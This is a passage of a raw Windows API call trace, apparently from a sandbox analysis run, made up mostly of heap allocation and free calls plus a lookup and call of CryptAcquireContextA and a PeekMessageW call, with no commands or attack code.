(HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0208.139] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.139] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0208.140] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.140] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0208.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.141] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0208.141] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0208.141] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.142] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.142] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.143] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.143] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.144] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.144] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0208.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466df0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0208.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.145] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0208.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.145] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b3a08 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.145] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x15) returned 0x2466df0 [0208.146] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466df0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9a0 | out: hHeap=0x25c0000) returned 1 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.146] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a08 | out: hHeap=0x25c0000) returned 1 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0208.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0208.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0208.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0208.147] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0208.147] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0208.147] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9a0 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0208.148] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.148] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa958 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0208.149] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0208.149] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0208.150] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0208.151] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0208.151] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0208.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0208.151] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0208.152] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0208.152] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: 